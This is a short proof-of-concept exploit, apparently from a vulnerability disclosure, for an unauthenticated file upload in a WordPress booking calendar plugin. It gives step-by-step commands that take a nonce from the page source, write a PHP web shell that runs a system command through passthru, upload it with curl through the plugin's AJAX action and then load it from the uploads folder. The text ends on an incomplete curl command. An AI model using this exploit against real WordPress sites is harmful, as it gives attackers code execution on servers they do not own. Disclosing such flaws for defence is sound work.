1. As an unauthenticated user, navigate to the main WordPress page
2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce")
3. Prepare a payload for upload:

echo '<?php passthru("id"); ?>' > /tmp/poc.php

4. Upload the payload with cURL, with the previously extracted nonce:

curl -i \
    -F 'action=wpdevart_form_ajax' \
    -F 'wpdevart_id=x' \
    -F 'wpdevart_nonce=<NONCE HERE>' \
    -F 'wpdevart_data={"wpdevart-submit":"X"}' \
    -F 'wpdevart-submit=1' \
    -F 'file=@/tmp/poc.php' 

5. Access your payload, it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>"

curl -i